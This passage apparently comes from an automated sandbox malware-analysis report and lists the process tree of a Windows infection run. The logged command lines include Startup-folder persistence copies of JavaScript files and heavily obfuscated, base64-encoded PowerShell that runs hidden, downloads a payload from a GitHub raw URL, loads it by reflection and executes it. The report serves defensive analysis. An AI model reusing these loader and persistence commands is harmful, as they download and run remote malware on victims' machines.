                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:11
                                                                                                        Start time:20:15:05
                                                                                                        Start date:07/10/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:12
                                                                                                        Start time:20:15:05
                                                                                                        Start date:07/10/2024
                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"cmd" /C echo %username%
                                                                                                        Imagebase:0x7ff66ff50000
                                                                                                        File size:289'792 bytes
                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:13
                                                                                                        Start time:20:15:05
                                                                                                        Start date:07/10/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:15
                                                                                                        Start time:20:15:09
                                                                                                        Start date:07/10/2024
                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
                                                                                                        Imagebase:0x7ff66ff50000
                                                                                                        File size:289'792 bytes
                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Target ID:16
                                                                                                        Start time:20:15:09
                                                                                                        Start date:07/10/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Target ID:17
                                                                                                        Start time:20:15:09
                                                                                                        Start date:07/10/2024
                                                                                                        Path:C:\Windows\System32\PING.EXE
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:ping 127.0.0.1 -n 10
                                                                                                        Imagebase:0x7ff6cbef0000
                                                                                                        File size:22'528 bytes
                                                                                                        MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Target ID:18
                                                                                                        Start time:20:15:09
                                                                                                        Start date:07/10/2024
                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
                                                                                                        Imagebase:0x7ff66ff50000
                                                                                                        File size:289'792 bytes
                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Target ID:19
                                                                                                        Start time:20:15:09
                                                                                                        Start date:07/10/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Target ID:20
                                                                                                        Start time:20:15:09
                                                                                                        Start date:07/10/2024
                                                                                                        Path:C:\Windows\System32\PING.EXE
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:ping 127.0.0.1 -n 10
                                                                                                        Imagebase:0x7ff6cbef0000
                                                                                                        File size:22'528 bytes
                                                                                                        MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Target ID:23
                                                                                                        Start time:20:15:15
                                                                                                        Start date:07/10/2024
                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_2p_bee.js.bat" "
                                                                                                        Imagebase:0x7ff66ff50000
                                                                                                        File size:289'792 bytes
                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:false

                                                                                                        Target ID:24
                                                                                                        Start time:20:15:15
                                                                                                        Start date:07/10/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:false

                                                                                                        Target ID:25
                                                                                                        Start time:20:15:15
                                                                                                        Start date:07/10/2024
                                                                                                        Path:C:\Windows\System32\wscript.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:wscript.exe "C:\Users\Public\Documents\2p_bee.js"
                                                                                                        Imagebase:0x7ff7d3820000
                                                                                                        File size:170'496 bytes
                                                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:false

                                                                                                        Target ID:26
                                                                                                        Start time:20:15:18
                                                                                                        Start date:07/10/2024
                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
                                                                                                        Imagebase:0x7ff66ff50000
                                                                                                        File size:289'792 bytes
                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Target ID:27
                                                                                                        Start time:20:15:18
                                                                                                        Start date:07/10/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Target ID:28
                                                                                                        Start time:20:15:18
                                                                                                        Start date:07/10/2024
                                                                                                        Path:C:\Windows\System32\PING.EXE
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:ping 127.0.0.1 -n 10
                                                                                                        Imagebase:0x7ff6cbef0000
                                                                                                        File size:22'528 bytes
                                                                                                        MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Target ID:29
                                                                                                        Start time:20:15:18
                                                                                                        Start date:07/10/2024
                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
                                                                                                        Imagebase:0x7ff7be880000
                                                                                                        File size:452'608 bytes
                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Target ID:30
                                                                                                        Start time:20:15:18
                                                                                                        Start date:07/10/2024
                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
                                                                                                        Imagebase:0x7ff7be880000
                                                                                                        File size:452'608 bytes
                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Target ID:31
                                                                                                        Start time:20:15:22
                                                                                                        Start date:07/10/2024
                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAoACAAJABlAE4AdgA6AGMATwBNAFMAUABFAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8ASQBOACcAJwApACgAIAAoACgAJwB7ADIAfQB1AHIAbAAgAD0AIAB7ADAAJwArACcAfQBoAHQAdAAnACsAJwBwAHMAOgAvAC8AcgBhAHcALgAnACsAJwBnAGkAdABoACcAKwAnAHUAJwArACcAYgB1AHMAZQByACcAKwAnAGMAbwBuAHQAJwArACcAZQBuAHQALgBjAG8AJwArACcAbQAvAE4AJwArACcAbwBEAGUAdABlAGMAJwArACcAdABPACcAKwAnAG4ALwBOAG8ARABlACcAKwAnAHQAZQBjAHQATwBuAC8AJwArACcAcgAnACsAJwBlACcAKwAnAGYAJwArACcAcwAvACcAKwAnAGgAZQAnACsAJwBhAGQAcwAvAG0AYQBpAG4ALwBEACcAKwAnAGUAdAAnACsAJwBhAGgATgBvAHQAZQBfAEoALgB0AHgAdAAnACsAJwB7ADAAfQAnACsAJwA7ACAAJwArACcAewAnACsAJwAyAH0AYgBhAHMAJwArACcAZQA2ADQAQwBvACcAKwAnAG4AJwArACcAdABlAG4AJwArACcAdAAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAJwArACcAIABTACcAKwAnAHkAcwB0ACcAKwAnAGUAbQAnACsAJwAuAE4AZQB0ACcAKwAnAC4AVwAnACsAJwBlACcAKwAnAGIAJwArACcAQwBsAGkAZQAnACsAJwBuACcAKwAnAHQAJwArACcAKQAuACcAKwAnAEQAJwArACcAbwB3AG4AbABvACcAKwAnAGEAJwArACcAZABTAHQAJwArACcAcgAnACsAJwBpACcAKwAnAG4AZwAnACsAJwAoAHsAJwArACcAMgB9AHUAcgBsACkAOwAgACcAKwAnAHsAMgB9AGIAaQAnACsAJwBuAGEAJwArACcAcgB5AEMAbwBuACcAKwAnAHQAZQBuAHQAIAA9ACAAWwBTACcAKwAnAHkAcwB0AGUAbQAuACcAKwAnAEMAbwBuAHYAZQByACcAKwAnAHQAXQA6ACcAKwAnADoARgByACcAKwAnAG8AJwArACcAbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAHsAMgB9AGIAYQAnACsAJwBzAGUANgA0ACcAKwAnAEMAJwArACcAbwBuAHQAJwArACcAZQBuAHQAKQAnACsAJwA7ACcAKwAnACAAewAyAH0AJwArACcAYQBzAHMAZQAnACsAJwBtACcAKwAnAGIAJwArACcAbAB5ACAAJwArACcAPQAgAFsAUgBlAGYAJwArACcAbABlACcAKwAnAGMAJwArACcAdABpACcAKwAnAG8AbgAuAEEAcwBzAGUAbQBiACcAKwAnAGwAeQBdADoAOgBMACcAKwAnAG8AYQAnACsAJwBkACcAKwAnACgAewAnACsAJwAyAH0AYgBpAG4AYQAnACsAJwByAHkAJwArACcAQwAnACsAJwBvAG4AdABlAG4AdAApADsAIAB7ADIAfQAnACsAJwBjACcAKwAnAG8AbQBtAGEAJwArACcAbgAnACsAJwBkACAAPQAnACsAJwAgAHsAMAB9AFsAJwArACcAZABuAGwAaQBiAC4AJwArACcASQBPAC4ASABvAG0AZQBdADoAOgAnACsAJwBWACcAKwAnAEEASQAoACcAKwAnAHsAJwArACcAMwAnACsAJwB9ADAALwAnACsAJwBLACcAKwAnAFMAQQBjACcAKwAnAEYAJwArACcALwBkACcAKwAnAC8AZQBlAC4AJwArACcAZQB0ACcAKwAnAHMAJwArACcAYQAnACsAJwBwAC8ALwA6AHMAcAB0ACcAKwAnAHQAaAAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzAH0AMQAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzACcAKwAnAH0AJwArACcAQwA6ACcAKwAnAHsAJwArACcAMQAnACsAJwB9AFAAcgBvACcAKwAnAGcAcgAnACsAJwBhAG0ARAAnACsAJwBhACcAKwAnAHQAJwArACcAYQB7ADEAJwArACcAfQB7ACcAKwAnADMAfQAsACAAewAnACsAJwAzACcAKwAnAH0AJwArACcAcgBhACcAKwAnAGoAYQBkAG8AJwArACcAewAzACcAKwAnAH0ALAAgACcAKwAnAHsAMwB9AEEAZAAnACsAJwBkACcAKwAnAEkAbgBQACcAKwAnAHIAbwBjAGUAcwBzADMAMgB7ADMAfQAsACcAKwAnACAAewAzACcAKwAnAH0AJwArACcAZAAnACsAJwBlAHMAJwArACcAYQB0ACcAKwAnAGkAdgBhAGQAbwB7ADMAfQAsACcAKwAnAHsAMwB9ACcAKwAnAHsAMwB9ACkAJwArACcAewAnACsAJwAwAH0AJwArACcAOwAnACsAJwAgAEkAJwArACcAbgB2AG8AawAnACsAJwBlAC0ARQB4ACcAKwAnAHAAJwArACcAcgBlAHMAcwBpAG8AbgAgAHsAMgAnACsAJwB9AGMAbwBtACcAKwAnAG0AJwArACcAYQBuACcAKwAnAGQAJwApACAALQBGACAAWwBjAEgAYQByAF0AMwA5ACwAWwBjAEgAYQByAF0AOQAyACwAWwBjAEgAYQByAF0AMwA2ACwAWwBjAEgAYQByAF0AMwA0ACkAIAApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                                        Imagebase:0x7ff7be880000
                                                                                                        File size:452'608 bytes
                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Target ID:32
                                                                                                        Start time:20:15:22
                                                                                                        Start date:07/10/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Target ID:33
                                                                                                        Start time:20:15:22
                                                                                                        Start date:07/10/2024
                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                                        Imagebase:0x7ff7be880000
                                                                                                        File size:452'608 bytes
                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Target ID:34
                                                                                                        Start time:20:15:22
                                                                                                        Start date:07/10/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Target ID:35
                                                                                                        Start time:20:15:22
                                                                                                        Start date:07/10/2024
                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $eNv:cOMSPEc[4,15,25]-JoIN'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/N'+'oDetec'+'tO'+'n/NoDe'+'tectOn/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/D'+'et'+'ahNote_J.txt'+'{0}'+'; '+'{'+'2}bas'+'e64Co'+'n'+'ten'+'t = (New-Object'+' S'+'yst'+'em'+'.Net'+'.W'+'e'+'b'+'Clie'+'n'+'t'+').'+'D'+'ownlo'+'a'+'dSt'+'r'+'i'+'ng'+'({'+'2}url); '+'{2}bi'+'na'+'ryCon'+'tent = [S'+'ystem.'+'Conver'+'t]:'+':Fr'+'o'+'mBase64String({2}ba'+'se64'+'C'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly '+'= [Ref'+'le'+'c'+'ti'+'on.Assemb'+'ly]::L'+'oa'+'d'+'({'+'2}bina'+'ry'+'C'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'IO.Home]::'+'V'+'AI('+'{'+'3'+'}0/'+'K'+'SAc'+'F'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+', {3}1'+'{3}'+', {3'+'}'+'C:'+'{'+'1'+'}Pro'+'gr'+'amD'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}Ad'+'d'+'InP'+'rocess32{3},'+' {3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' I'+'nvok'+'e-Ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -F [cHar]39,[cHar]92,[cHar]36,[cHar]34) )"
                                                                                                        Imagebase:0x7ff7be880000
                                                                                                        File size:452'608 bytes
                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Target ID:36
                                                                                                        Start time:20:15:23
                                                                                                        Start date:07/10/2024
                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
                                                                                                        Imagebase:0x7ff7be880000
                                                                                                        File size:452'608 bytes
                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Target ID:37
                                                                                                        Start time:20:15:23
                                                                                                        Start date:07/10/2024
                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_2x_bee.js.bat" "
                                                                                                        Imagebase:0x7ff66ff50000
                                                                                                        File size:289'792 bytes
                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:false

                                                                                                        Target ID:38
                                                                                                        Start time:20:15:23
                                                                                                        Start date:07/10/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:false

                                                                                                        Target ID:39
                                                                                                        Start time:20:15:24
                                                                                                        Start date:07/10/2024
                                                                                                        Path:C:\Windows\System32\wscript.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:wscript.exe "C:\Users\Public\Documents\2x_bee.js"
                                                                                                        Imagebase:0x7ff7d3820000
                                                                                                        File size:170'496 bytes
                                                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
